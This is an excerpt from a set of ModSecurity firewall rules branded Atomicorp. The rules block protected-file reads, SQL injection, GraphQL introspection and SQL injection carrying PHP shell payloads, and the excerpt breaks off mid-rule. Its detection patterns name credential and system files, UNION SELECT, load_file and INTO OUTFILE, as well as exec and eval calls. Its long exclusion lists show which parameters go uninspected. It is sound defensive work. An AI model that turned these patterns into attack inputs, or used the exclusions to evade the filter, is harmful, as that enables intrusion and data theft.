+SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|!ARGS:/hilit/|!ARGS:/hilight/|!ARGS:/highlight/|!ARGS:/body/|!ARGS:/post/|!ARGS:/txt|!ARGS:resolution|!ARGS:tiny_vals|!ARGS:/description/|!ARGS:title|!ARGS:/content/|!ARGS:/title/|!ARGS:/systemfilter/|!ARGS:parent_name|!ARGS:/^config_setting/|!ARGS:name|!ARGS:v_zZ_ConfDir|!ARGS:/keyword/|!ARGS:/desc/|!ARGS:/summary/|!ARGS:csum|!ARGS:suffix|!ARGS:prefix|!ARGS:/note/|!ARGS:/solution/|!ARGS:/msg/|!ARGS:/highlight/|!ARGS:/text/|!ARGS:/search/|!ARGS:/subject/|!ARGS:/message/|!ARGS:/post/|!ARGS:/resolution/|!ARGS:/problem/|!ARGS:/data/ "(?:\b(?:\.(?:ht(?:access|passwd|group)|www_?acl)|global\.asa|httpd\.conf|boot\.ini|web.config)\b|( |^|\.\.)/etc/|/\.(?:history|bash_history|sh_history|env)$)" "phase:2,deny,status:403,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:cmdLine,ctl:auditLogParts=+E,deny,log,auditlog,msg:'Atomicorp.com WAF Rules: Attempt to access protected file remotely',id:'390709',rev:30,logdata:'%{TX.0}',severity:'2'"
+
+SecMarker END_RULE_390709
+
+SecMarker END_ASL_3
+
+SecRule REQUEST_HEADERS|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie "(?:\b(?:\.(?:ht(?:access|passwd|group)|www_?acl)|global\.asa|httpd\.conf|boot\.ini)\b|\/etc\/|/\.(?:history|bash_history|sh_history)$)" "phase:2,deny,status:403,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:compressWhitespace,t:cmdLine,ctl:auditLogParts=+E,deny,log,auditlog,msg:'Atomicorp.com WAF Rules: Attempt to access protected file remotely',id:'390719',rev:6,logdata:'%{TX.0}',severity:'2'"
+#
+SecMarker END_FILE_PROTECTION_2
+
+
+################ SQL injection rules #########################
+#Always SQL injection cases w/ antievasion
+SecRule REQUEST_FILENAME "\.(?:(?:m|j)pe?g4?|flv|bmp|tiff?|p(?:(?:p|g|b)m|n(?:g|m)|df|s)|gif|css|ico|avi|w(?:m(?:v|a)|ebp)|mp(?:3|4)|cgm|svg|swf|og(?:m|v|x)|xls|doc|od(?:t|s)|ppt|wbk)$" "phase:2,pass,id:'333797',t:none,t:lowercase,nolog,noauditlog,setvar:tx.static=1,skipAfter:END_SQL_CHECKS"
+
+SecRule REQUEST_URI "(^/node/add/|/admin/content/|/todo\?action=edit$|^/eprocservice/supplierinboundservice|^/ntunnel_mysql|^/([a-z0-9]+/)index\.php\?controller=adminmodules\?configure=megaimporter)"  "phase:2,pass,id:'333798',t:none,t:lowercase,nolog,noauditlog,skipAfter:END_SQL_CHECKS"
+
+SecRule ARGS:module "^modulebuilder$" "phase:2,pass,id:'353799',t:none,t:lowercase,nolog,noauditlog,skipAfter:END_SQL_CHECKS"
+
+SecRule REQUEST_URI "(?:^/adminer/adminer\.php\?server=|^/[a-z]+/index\.php\?/tickets/ajax/replylock)"  "phase:2,pass,id:'375798',t:none,t:lowercase,nolog,noauditlog,skipAfter:END_SQL_CHECKS_PM1"
+
+SecRule REQUEST_URI "^/index\.php\?route=/table/replace$" "id:321112,rev:1,phase:2,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skipAfter:SKIP_AFTER_RULE_344367" 
+
+#SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|!ARGS:availability|!ARGS:SAMLResponse|!ARGS:import|!ARGS:/_tbl/|!ARGS:/wp_autosave/|!ARGS:/searchclause/|!ARGS:ausgabe|!ARGS:/google/|!ARGS:/theme/|!ARGS:/form/|!ARGS:/content/|!ARGS:/^cms_partial/|!ARGS:/type/|!ARGS:/text/|!ARGS:storage_alter_type|!ARGS:/database/|!ARGS:prod_|!ARGS:/prod_/|!ARGS:/^field_type/|!ARGS:prefix|!ARGS:suffix|!ARGS:/table_select/|!ARGS:/^vpinfo/|!ARGS:website|!ARGS:suffix|!ARGS:Body|!ARGS:wikitext|!ARGS:type|!ARGS:content|!ARGS:/^Cms_Page/|!ARGS:areas|!ARGS:templatecode|!ARGS:website|!ARGS:/insertstring/|!ARGS:signature|!ARGS:/description/|!ARGS:Db_submit|!ARGS:text|!ARGS:code|!ARGS:comment|!ARGS:/^table/|!ARGS:/message/|!ARGS:query|!ARGS_NAMES:table_name|!ARGS:/jql/|!ARGS:/sql/|!ARGS:/^table/|!ARGS:resolution|!ARGS_NAMES:/conf_varchar/|!ARGS:input_25|!ARGS_NAMES:/^jform/|XML:/* "@rx (?i)\b(?:c(?:o(?:n(?:v(?:ert(?:_tz)?)?|cat(?:_ws)?|nection_id)|(?:mpres)?s|ercibility|(?:un)?t|llation|alesce)|ur(?:rent_(?:time(?:stamp)?|date|user)|(?:dat|tim)e)|h(?:ar(?:(?:acter)?_length|set)?|r)|iel(?:ing)?|ast|r32)|s(?:u(?:b(?:str(?:ing(?:_index)?)?|(?:dat|tim)e)|m)|t(?:d(?:dev_(?:sam|po)p)?|r(?:_to_date|cmp))|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha[12]?|oundex|chema|ig?n|leep|pace|qrt)|i(?:s(?:_(?:ipv(?:4(?:_(?:compat|mapped))?|6)|n(?:ot(?:_null)?|ull)|(?:free|used)_lock)|null)|n(?:et(?:6_(?:aton|ntoa)|_(?:aton|ntoa))|s(?:ert|tr)|terval)?|f(?:null)?)|d(?:a(?:t(?:e(?:_(?:format|add|sub)|diff)?|abase)|y(?:of(?:month|week|year)|name)?)|e(?:(?:s_(?:de|en)cryp|faul)t|grees|code)|count|ump)|l(?:o(?:ca(?:l(?:timestamp)?|te)|g(?:10|2)?|ad_file|wer)|ast(?:_(?:inser_id|day))?|e(?:(?:as|f)t|ngth)|case|trim|pad|n)|u(?:n(?:compress(?:ed_length)?|ix_timestamp|hex)|tc_(?:time(?:stamp)?|date)|p(?:datexml|per)|uid(?:_short)?|case|ser)|t(?:ime(?:_(?:format|to_sec)|stamp(?:diff|add)?|diff)?|o(?:(?:second|day)s|_base64|n?char)|r(?:uncate|im)|an)|m(?:a(?:ke(?:_set|date)|ster_pos_wait|x)|i(?:(?:crosecon)?d|n(?:ute)?)|o(?:nth(?:name)?|d)|d5)|r(?:e(?:p(?:lace|eat)|lease_lock|verse)|a(?:wtohex|dians|nd)|o(?:w_count|und)|ight|trim|pad)|f(?:i(?:eld(?:_in_set)?|nd_in_set)|rom_(?:unixtime|base64|days)|o(?:und_rows|rmat)|loor)|p(?:o(?:w(?:er)?|sition)|eriod_(?:diff|add)|rocedure_analyse|assword|g_sleep|i)|a(?:s(?:cii(?:str)?|in)|es_(?:de|en)crypt|dd(?:dat|tim)e|(?:co|b)s|tan2?|vg)|b(?:i(?:t_(?:length|count|x?or|and)|n(?:_to_num)?)|enchmark)|e(?:x(?:tract(?:value)?|p(?:ort_set)?)|nc(?:rypt|ode)|lt)|g(?:r(?:oup_conca|eates)t|et_(?:format|lock))|v(?:a(?:r(?:_(?:sam|po)p|iance)|lues)|ersion)|o(?:(?:ld_passwo)?rd|ct(?:et_length)?)|we(?:ek(?:ofyear|day)?|ight_string)|n(?:o(?:t_in|w)|ame_const|ullif)|h(?:ex(?:toraw)?|our)|qu(?:arter|ote)|year(?:week)?|xmltype)\W*\(" "id:344367,rev:10,phase:2,deny,status:403,capture,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules: SQL Injection Attack',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',tag:'SQLi',ctl:auditLogParts=+E"
+
+SecMarker SKIP_AFTER_RULE_344367
+
+#GraphQL
+#query IntrospectionQuery {
+#{__schema{queryType{
+SecRule REQUEST_BODY|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|!ARGS:_wp_http_referer|!ARGS:SAMLResponse|!ARGS:import|!ARGS:/_tbl/|!ARGS:/wp_autosave/|!ARGS:/searchclause/|!ARGS:/^cms_partial/|!ARGS:/type/|!ARGS:/text/|!ARGS:storage_alter_type|!ARGS:/database/|!ARGS:/^field_type/|!ARGS:prefix|!ARGS:suffix|!ARGS:/table_select/|!ARGS:/^vpinfo/|!ARGS:website|!ARGS:suffix|!ARGS:Body|!ARGS:wikitext|!ARGS:type|!ARGS:content|!ARGS:/^Cms_Page/|!ARGS:areas|!ARGS:templatecode|!ARGS:website|!ARGS:/insertstring/|!ARGS:signature|!ARGS:/description/|!ARGS:Db_submit|!ARGS:text|!ARGS:code|!ARGS:comment|!ARGS:/^table/|!ARGS:/message/|!ARGS:query|!ARGS:/sql/|!ARGS:/^table/|!ARGS:resolution|!ARGS_NAMES:/conf_varchar/|!ARGS_NAMES:/^jform/|!ARGS:attachment_hash_combined|XML:/* "@rx (?:query introspectionquery ?|__schema\ ?{ ?(?:querytype|types?)) ?\{" "id:344378,rev:2,phase:2,deny,status:403,capture,t:none,t:urlDecodeUni,t:removecomments,t:compressWhiteSpace,t:lowercase,msg:'Atomicorp.com WAF Rules: GraphQL Injection Attack attempt',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',tag:'SQLi',severity:'CRITICAL'"
+
+#SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|!REQUEST_COOKIES:home_branch|ARGS_NAMES|ARGS|!ARGS:data|!ARGS:_wp_http_referer|!ARGS:SAMLResponse|!ARGS:import|!ARGS:/_tbl/|!ARGS:/wp_autosave/|!ARGS:/searchclause/|!ARGS:/^cms_partial/|!ARGS:/type/|!ARGS:/text/|!ARGS:storage_alter_type|!ARGS:/database/|!ARGS:/^field_type/|!ARGS:prefix|!ARGS:suffix|!ARGS:/table_select/|!ARGS:/^vpinfo/|!ARGS:website|!ARGS:suffix|!ARGS:Body|!ARGS:wikitext|!ARGS:type|!ARGS:content|!ARGS:/^Cms_Page/|!ARGS:areas|!ARGS:templatecode|!ARGS:website|!ARGS:/insertstring/|!ARGS:signature|!ARGS:/description/|!ARGS:Db_submit|!ARGS:text|!ARGS:code|!ARGS:comment|!ARGS:/^table/|!ARGS:/message/|!ARGS:query|!ARGS_NAMES:table_name|!ARGS:/sql/|!ARGS:/^table/|!ARGS:resolution|!ARGS_NAMES:/conf_varchar/|!ARGS_NAMES:/^jform/|!ARGS:attachment_hash_combined|!ARGS:/content/|!ARGS:/html/|!ARGS:/email/|!ARGS:/signature/|XML:/* "@rx (?i:[\"'`]\s*?(?:(?:n(?:and|ot)|(?:x?x)?or|between|\|\||and|div|&&)\s+[\s\w]+=\s*?\w+\s*?having\s+|like(?:\s+[\s\w]+=\s*?\w+\s*?having\s+|\W*?[\"'`\d])|\*\s*?\w+\W+[\"'`])|(?:union\s*?(?:distinct|[(!@]*?|all)?\s*?[([]*?\s*?select|select\s+?[\[\]()\s\w\.,\"'`-]+from)\s+|\w\s+like\s+[\"'`]|find_in_set\s*?\(|like\s*?[\"'`]%)" "id:344371,rev:4,phase:2,deny,status:403,capture,t:none,t:urlDecodeUni,msg:'Atomicorp.com WAF Rules: SQL Injection Attack/SQL authentication bypass attempt',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',tag:'SQLi',severity:'CRITICAL'"
+
+
+
+#SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|!ARGS:_wp_http_referer|!ARGS:SAMLResponse|!ARGS:import|!ARGS:/_tbl/|!ARGS:/wp_autosave/|!ARGS:/searchclause/|!ARGS:/^cms_partial/|!ARGS:/type/|!ARGS:/text/|!ARGS:storage_alter_type|!ARGS:/database/|!ARGS:/^field_type/|!ARGS:prefix|!ARGS:suffix|!ARGS:/table_select/|!ARGS:/^vpinfo/|!ARGS:website|!ARGS:suffix|!ARGS:Body|!ARGS:wikitext|!ARGS:type|!ARGS:content|!ARGS:/^Cms_Page/|!ARGS:areas|!ARGS:templatecode|!ARGS:website|!ARGS:/insertstring/|!ARGS:signature|!ARGS:/description/|!ARGS:Db_submit|!ARGS:text|!ARGS:code|!ARGS:comment|!ARGS:/^table/|!ARGS:/message/|!ARGS:query|!ARGS_NAMES:table_name|!ARGS:/sql/|!ARGS:/^table/|!ARGS:resolution|!ARGS_NAMES:/conf_varchar/|!ARGS_NAMES:/^jform/|!ARGS:attachment_hash_combined|XML:/* "@rx (?i:[\"'`](?:\s*?(?:(?:\*.+(?:(?:an|i)d|between|like|x?or|div)\W*?[\"'`]|(?:between|like|x?or|and|div)\s[^\d]+[\w-]+.*?)\d|[^\w\s?]+\s*?[^\w\s]+\s*?[\"'`]|[^\w\s]+\s*?[\W\d].*?(?:--|#))|.*?\*\s*?\d)|[()\*<>%+-][\w-]+[^\w\s]+[\"'`][^,]|\^[\"'`])" "id:344374,rev:2,phase:2,deny,status:403,capture,t:none,t:urlDecodeUni,msg:'Atomicorp.com WAF Rules: SQL Injection Attack attempt',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',tag:'SQLi',severity:'CRITICAL'"
+
+
+
+SecRule ARGS|!ARGS:/^cms_partial/|!ARGS:/type/|!ARGS:/searchClause/|!ARGS:import|!ARGS:DR|!ARGS:SAMLResponse|!ARGS:/wizArray/|!ARGS:/^Cms_Page/|!ARGS:search|!ARGS:pagetext|!ARGS:/database/|!ARGS:/^vpinfo/|!ARGS:website|!ARGS:suffix|!ARGS:Body|!ARGS:wikitext|!ARGS:type|!ARGS:content|!ARGS:areas|!ARGS:templatecode|!ARGS:website|!ARGS:/insertstring/|!ARGS:signature|!ARGS:/description/|!ARGS:Db_submit|!ARGS:text|!ARGS:code|!ARGS:comment|!ARGS:/sql/|!ARGS:prefix|!ARGS:/message/|!ARGS:query|!ARGS:/sql/|!ARGS:prefix|!ARGS:resolution|REQUEST_HEADERS|XML:/*|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|!REQUEST_COOKIES:/utm/|!REQUEST_COOKIES:/_pk_ref/|!REQUEST_COOKIES_NAMES:/utm/|!REQUEST_COOKIES_NAMES:/_pk_ref/ "@pmFromFile sql.txt"  "phase:2,deny,log,auditlog,status:403,capture,id:340155,t:none,t:urlDecodeUni,t:replaceComments,t:compressWhiteSpace,rev:25,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL Injection protection',logdata:'%{TX.0}',tag:'SQLi'"
+
+SecMarker END_SQL_CHECKS_PM1
+
+#Always SQL injection cases w/ antievasion
+#SecRule ARGS|!ARGS:/installcode/|!ARGS:/sql/|!ARGS:prefix|!ARGS:s_manifest|!ARGS:/database/|!ARGS:content|!ARGS:newcontent|!ARGS:query|!ARGS:/description/|!ARGS:/text/|!ARGS:Db_submit|!ARGS:/table/|!ARGS:EXPORTTABLE|!ARGS:/message/|!ARGS:previous_field|ARGS_NAMES|REQUEST_HEADERS|XML:/*|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:X-PageView|!ARGS_NAMES:/varchar/|!ARGS_NAMES:cfg_xsp_password|!ARGS:/body/|!ARGS:runQuery|!ARGS:field_type[]|!ARGS:/^field_type/|!ARGS:/^fieldtype_/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/subject/ "@pmFromFile sql.txt" "phase:2,deny,status:403,capture,id:340160,t:none,t:replaceComments,t:compressWhiteSpace,rev:30,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL Injection protection',logdata:'%{TX.0}',chain"
+#SecRule ARGS:module "!(^modulebuilder$)" "t:none,t:lowercase"
+#SecRule REQUEST_URI "/index\.php\?module=administration"
+
+#Always SQL injection cases w/ antievasion
+SecRule ARGS|!ARGS:pagetext|!ARGS:/wizArray/|!ARGS:/database/|!ARGS:/installcode/|!ARGS:areas|!ARGS:templatecode|!ARGS:s_manifest|!ARGS:Db_submit|!ARGS:/database/|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|ARGS_NAMES|!ARGS:/description/|!ARGS:/insertstring/|!ARGS_NAMES:/conf_varchar/|!ARGS_NAMES:table_name|REQUEST_HEADERS|XML:/*|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|!REQUEST_COOKIES_NAMES:/utm/|!REQUEST_COOKIES_NAMES:/_pk_ref/|!REQUEST_COOKIES_NAMES:/sql/ "@pmFromFile sql.txt" "phase:2,deny,log,auditlog,status:403,capture,id:380023,t:none,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,rev:8,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL Injection protection',logdata:'%{TX.0}',tag:'SQLi'"
+
+#Always SQL injection cases w/ antievasion
+SecRule ARGS|!ARGS:pagetext|!ARGS:message|!ARGS:/wizArray/|!ARGS:/database/|!ARGS:Db_submit|!ARGS:areas|!ARGS:templatecode|!ARGS:/description/|!ARGS:/sql/|!ARGS:prefix|!ARGS:/database/|!ARGS:/insertstring/|!ARGS:query|ARGS_NAMES|!ARGS_NAMES:table_name|REQUEST_HEADERS|XML:/*|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|!REQUEST_COOKIES_NAMES:/utm/|!REQUEST_COOKIES_NAMES:/_pk_ref/|!REQUEST_COOKIES:/utm/ "@pmFromFile sql.txt"  "phase:2,deny,log,auditlog,status:403,capture,id:380024,t:none,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL Injection protection',logdata:'%{TX.0}',tag:'SQLi'"
+
+
+SecMarker END_SQL_CHECKS
+
+SecRule REQUEST_URI "union ?\(?select ?\(" "phase:1,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:lowercase,t:replaceComments,t:compressWhiteSpace,msg:'Atomicorp.com WAF Rules: SQL injection',id:380123,rev:5,logdata:'%{TX.0}',severity:'2',tag:'SQLi'"
+
+####################################
+#First major set
+Secrule REQUEST_URI "^/(?:eprocservice/supplierinboundservice|ntunnel_mysql)" "phase:2,id:344356,t:none,t:lowercase,pass,nolog,noauditlog,skipAfter:END_INJECTION_RULES_ALL"
+
+SecRule REQUEST_URI|REQUEST_COOKIES|!REQUEST_COOKIES:/utm/|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|REQUEST_HEADERS|ARGS|!ARGS:/^Cms_Page/|!ARGS:/database/|!ARGS:templatecode|!ARGS:/insertstring/|!ARGS:areas|XML:/* "@pm select having grant delete insert drop alter replace truncate update create rename describe table database dba index into from convert bulk column update set union or = ' -- procedure declare serialize passthru outfile null <> eval create_function system exec trucate sleep benchmark create_function reg_replace(" "phase:2,id:'333799',t:none,t:urlDecodeUni,t:removeComments,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:334363,t:none,pass,nolog,noauditlog,skipAfter:END_SQL_INJECTION_RULE_1"
+
+
+#allow for truevault
+SecRule REQUEST_URI "^(?:/([a-z0-9]+/)?wp-load\.php\?vaultpress=true|/ntunnel_mysql|^/\?r=events/update)" "phase:2,id:336317,t:none,t:lowercase,pass,nolog,noauditlog,skipAfter:END_RULE_380122"
+
+#SQL stored procedure injection
+SecRule REQUEST_URI|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|!REQUEST_COOKIES_NAMES:/utm/|!REQUEST_COOKIES_NAMES:/_pk_ref/|!REQUEST_COOKIES:/utm/|!REQUEST_COOKIES:/_pk_ref/|XML:/*|ARGS|!ARGS:/^Cms_Page/|!ARGS:/database/|!ARGS:/insertstring/|!ARGS:pagetext|!ARGS:/database/|!ARGS:comment|!ARGS:templatecode|!ARGS:areas|!ARGS:content|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:/text/|!ARGS:/message/|!ARGS:/body/ "(?:procedure\s+analyse\s.{0,100}\(|create\s+(procedure|function)\s.{0,100}\w+\s.{0,100}\(\s.{0,200}\)\s.{0,100}declare[^\w]+[@#]\s.{0,100}\w+|exec\s.{0,100}\(\s.{0,200}@|\b(?:sleep|benchmark)\b ?\( ?[0-9])" "phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:replaceComments,t:compressWhiteSpace,t:lowercase,msg:'Atomicorp.com WAF Rules: MySQL and PostgreSQL stored procedure/function injections',id:380122,rev:5,logdata:'%{TX.0}',severity:'2',tag:'SQLi'"
+
+SecMarker END_RULE_380122
+
+#allow for truevault
+SecRule REQUEST_URI "^/administrator/index\.php\?option=com_hikashop&ctrl=" "phase:2,id:346317,t:none,t:lowercase,pass,nolog,noauditlog,skipAfter:END_RULE_380025"
+
+#PHP shell code SQL injection
+SecRule REQUEST_URI|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|!REQUEST_COOKIES_NAMES:/utm/|!REQUEST_COOKIES_NAMES:/_pk_ref/|!REQUEST_COOKIES:/utm/|!REQUEST_COOKIES:/_pk_ref/|ARGS|!ARGS:/database/|!ARGS:SAMLResponse|!ARGS:/insertstring/|!ARGS:pagetext|!ARGS:templatecode|!ARGS:areas|!ARGS:/database/|!ARGS:comment|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:/prefix/|!ARGS:/suffix/|!ARGS:definition|XML:/* "(?:\bunion\b.{1,100}?\bselect\b.{1,100}?php.{1,100}?(?:passthru|serialize|system|eval|create_function|create_function|preg_\w+|exec|shell_exec ?(?:\(|\: ?'?))|select.{1,100}?(?:php|perl).{1,100}?into outfile|reg_replace ?\()" "phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:replaceComments,t:compressWhiteSpace,t:lowercase,msg:'Atomicorp.com WAF Rules: SQL injection with PHP/PERL payload',id:380025,rev:8,logdata:'%{TX.0}',severity:'2',tag:'SQLi',tag:'RCE'"
+
+
+
+SecMarker END_RULE_380025
+
+# Rule 340013:
+#Prevent SQL injection in cookies
+SecRule REQUEST_COOKIES|REQUEST_HEADERS:User-Agent|!REQUEST_COOKIES:/utm/|!REQUEST_COOKIES:/_pk_ref/|!REQUEST_COOKIES:/temp_widdit/|!REQUEST_COOKIES:/sql/ "(?:\b(?:select|grant|delete|insert|alter|replace|truncate|update|create|rename|describe)\b[[:space:]]+[a-z|0-9|\*| |\}|\{|\,\(\)]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\bunion\b.{1,100}?\bselect\b.[a-z0-9]|select (?:load_file|char\()|(?:insert|remark)test;|\bdrop (?:all tables|table [a-z0-9]+|[a-z0-9]+) ?;)" "phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,id:340013,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL injection in cookie or UA',logdata:'%{TX.0}',tag:'SQLi'"
+
+# Rule 340015:
+#Prevent SQL injection in UA
+#SecRule REQUEST_HEADERS:User-Agent "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|union select [a-z0-9])" "t:replaceComments,t:compressWhiteSpace,id:340015,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL injection in User Agent header'"
+#
+SecRule REQUEST_URI "(?:(?:/wp-admin/post|privmsg|/ticket/admin|/misc|tiki-editpage|/post|/imp/compose|/posting)\.php|/modules\.php\?op=modload&name=(?:downloads|submit_news)|/admin\.php\?module=ns\-addStory\&op=|/index\.php\?name=pnphpbb2&file=posting&mode=reply|/phpmyadmin/|/pnphpbb2-posting\.html|/otrs/index\.pl|tiki-index\.php\?page=|/index\.php\?title=.*&action=edit|/node/[0-9]+/edit|/editcode/|^/ntunnel_mysql/^/([a-z0-9]+/)index\.php\?controller=adminmodules\?configure=megaimporter)" "phase:2,t:none,t:lowercase,pass,nolog,noauditlog,id:340015,skipAfter:END_RULE_340016"
+
+# Rule 340016:
+SecRule REQUEST_HEADERS|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie|REQUEST_COOKIES|!REQUEST_COOKIES:/sql/|!REQUEST_COOKIES:/temp_widdit/|!REQUEST_COOKIES:/utm/|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|!REQUEST_COOKIES_NAMES:/utm/|!REQUEST_COOKIES_NAMES:/_pk_ref/|ARGS|XML:/*|!ARGS:/opgaver/|!ARGS:/^Cms_Page/|!ARGS:/insertstring/|!ARGS:pagetext|!ARGS:/brief/|!ARGS:templatecode|!ARGS:area|!ARGS:/changelog/|!ARGS:permissions|!ARGS:/^p_posts/|!ARGS:po|!ARGS:et_pb_unprocessed_data|!ARGS:data|!ARGS:contenido|!ARGS:content|!ARGS:/siteorigin/|!ARGS:panels_data|!ARGS:source|!ARGS:/calotropis/|!ARGS:/searchclause/|!ARGS:resolution|!ARGS:SAMLResponse|!ARGS:/^info/|!ARGS:/narrative/|!ARGS:/FCKeditor/|!ARGS:/txt/|!ARGS:inc|!ARGS:op|!ARGS:_signature|!ARGS:/^label_/|!ARGS:/teaser/|!ARGS:bio|!ARGS:/installcode/|!ARGS:UserData|!ARGS:code|!ARGS:/report/|!ARGS:/^gcaption/|!ARGS:/^p_process_chats/|!ARGS:/database/|!ARGS:/^para/|!ARGS:/comment/|!ARGS:/keywords/|!ARGS:cf85|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:/desc/|!ARGS:movie_brief|!ARGS:/text/|!ARGS:/message/|!ARGS:ncontent|!ARGS:/body/|!ARGS:/content/|!ARGS:searchword|!ARGS:contactMessage|!ARGS:cts|!ARGS:meta_descr|!ARGS:edited|!ARGS:content|!ARGS:Post|!ARGS:body|!ARGS:ll_content_message|!ARGS:page-content|!ARGS:reply|!ARGS:xml|!ARGS:content_en|!ARGS:filecontent|!ARGS:message|!ARGS:content_en|!ARGS:response[14]|!ARGS:/article/|!ARGS:data[Application][cv] "(?:(?:truncate|truncate|rename)[[:space:]]+[a-z| |0-9|\*|\.|\,|\(|\)|_|\-]+[[:space:]]+(?:into|from|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\{|\.|\,|\(|\)|_|\-]|\bunion\b.{1,256}?select.{1,256}[a-z0-9\(\)].{1,256}(?:from|#|, ?[0-9a-z]|--)|\bselect\b.{1,256}?(?:load_file|char\()|(?:insert|remark)test ?;|insert [a-z|0-9|\*|\,]+ (?:from|into|table|database|index|view|\{|\'|\`)[[:space:]]+\(|update [a-z0-9]+set |insert into (?:\{|\'|\`)|\btruncate table|delete from [a-z0-9]+ where|\' or true --|create (?:database|table) [a-z0-9]+ ?;|\breplace ?\( \'|\bgrant [a-z]+ on |select[[:space:]]+(?:[a-z|0-9|\*|\.|\,|\(|\)|_|\-]|[a-z|0-9|\*|\.|\,|\(|\)|_|\-] ?, ?)+[[:space:]]+(?:into|from|table|index|view)[[:space:]]+[a-z|0-9|\*| |\{|\.|\,|\(|\)|_|\-]|\bdrop (?:all tables|table [a-z0-9]+|[a-z0-9]+) ?;|\balter\b [a-z0-9]+ [a-z0-9]+ ?\;)" "phase:2,deny,log,auditlog,status:403,capture,multimatch,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:removecomments,t:compressWhiteSpace,id:340016,rev:48,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  SQL injection attempt detected',logdata:'%{TX.0}',tag:'SQLi'"
+
+SecMarker END_RULE_340016
+
+#bypass for these, no args
+SecRule TX:STATIC "@eq 1" "phase:2,id:'333800',pass,t:none,nolog,noauditlog,skipAfter:END_SQL_CHECKS_2"
+
+#SecRule REQUEST_FILENAME "\.(?:(?:m|j)pe?g4?|bmp|tiff?|p(?:(?:p|g|b)m|n(?:g|m)|df)|gif|css|ico|avi|flv|w(?:m(?:v|a)|ebp)|mp(?:3|4)|cgm|svg|swf|og(?:m|v|x)|doc|xls|od(?:t|s)|ppt|wbk)$" phase:2,id:'333800',pass,t:none,t:lowercase,nolog,noauditlog,skipAfter:END_SQL_CHECKS_2
+
+# Rule 340017:
+SecRule REQUEST_URI|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|!REQUEST_COOKIES:/temp_widdit/|!REQUEST_COOKIES_NAMES:/utm/|!REQUEST_COOKIES_NAMES:/_pk_ref/|ARGS|!ARGS:SAMLResponse|!ARGS:/^Cms_Page/|!ARGS:/database/|!ARGS:/insertstring/|!ARGS:pagetext|!ARGS:ncontent|!ARGS:/body/|!ARGS:/installcode/|!ARGS:code|!ARGS:/content/|!ARGS:/database/|!ARGS:searchword|!ARGS:add_keywords|!ARGS:comment|!ARGS:comments|!ARGS:text|!ARGS:/description/|!ARGS:contenido|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:contactMessage|!ARGS:cts|!ARGS:meta_descr|!ARGS:text|!ARGS:edited|!ARGS:content|!ARGS:introtext|!ARGS:Post|!ARGS:itembigtext|!ARGS:/article/|!ARGS:body|!ARGS:mytextarea|!ARGS:ll_content_message|!ARGS:page-content|!